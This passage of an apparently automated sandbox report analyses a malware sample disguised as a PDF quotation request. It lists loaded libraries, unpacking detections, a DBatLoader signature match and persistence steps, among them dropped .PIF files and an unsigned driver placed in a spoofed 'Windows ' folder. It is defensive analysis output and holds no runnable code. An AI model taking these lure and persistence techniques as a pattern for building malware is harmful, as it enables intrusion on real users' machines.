                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeStatic file information: File size 1525248 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: kmtqwssC.pif, 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1652551024.000000002CBF5000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1642276952.000000002CA44000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000002.1881572737.000000002CF3E000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: kmtqwssC.pif, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifUnpacked PE file: 6.2.kmtqwssC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifUnpacked PE file: 12.2.kmtqwssC.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifUnpacked PE file: 16.2.kmtqwssC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.24665a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.2950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.24665a8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2043784716.0000000001360000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000001.1672552256.0000000001360000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000001.1542389748.0000000001360000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1977379900.0000000001360000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1415147873.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: kmtqwssC.pif.1.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_029687A0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029532FC push eax; ret 1_2_02953338
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0297C2FC push 0297C367h; ret 1_2_0297C35F
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295635C push 029563B7h; ret 1_2_029563AF
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295635A push 029563B7h; ret 1_2_029563AF
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0297C0AC push 0297C125h; ret 1_2_0297C11D
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0297C1F8 push 0297C288h; ret 1_2_0297C280
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0297C144 push 0297C1ECh; ret 1_2_0297C1E4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029686C0 push 02968702h; ret 1_2_029686FA
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295673E push 02956782h; ret 1_2_0295677A
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02956740 push 02956782h; ret 1_2_0295677A
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295C4F4 push ecx; mov dword ptr [esp], edx1_2_0295C4F9
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296E5B4 push ecx; mov dword ptr [esp], edx1_2_0296E5B9
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295D528 push 0295D554h; ret 1_2_0295D54C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295CB74 push 0295CCFAh; ret 1_2_0295CCF2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0297BB6C push 0297BD94h; ret 1_2_0297BD8C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02967894 push 02967911h; ret 1_2_02967909
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029668D0 push 0296697Bh; ret 1_2_02966973
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029668CE push 0296697Bh; ret 1_2_02966973
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02968916 push 02968950h; ret 1_2_02968948
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02968918 push 02968950h; ret 1_2_02968948
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296A920 push 0296A958h; ret 1_2_0296A950
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0295C976 push 0295CCFAh; ret 1_2_0295CCF2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02962EE8 push 02962F5Eh; ret 1_2_02962F56
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02965E04 push ecx; mov dword ptr [esp], edx1_2_02965E06
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02962FF4 push 02963041h; ret 1_2_02963039
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02962FF3 push 02963041h; ret 1_2_02963039
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040D99D push esp; iretd 6_2_0040D99E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_00416373 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_00416305 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004163B1 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004034E0 push eax; ret 6_2_004034E2

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Users\Public\Libraries\kmtqwssC.pifJump to dropped file
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Users\Public\Libraries\Csswqtmk.PIFJump to dropped file
                      Sample is not signed and drops a device driver
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: \rtd20241038ii listed parts and quotation request ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: \rtd20241038ii listed parts and quotation request ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: \rtd20241038ii listed parts and quotation request ,pdf.scr.exeJump to behavior
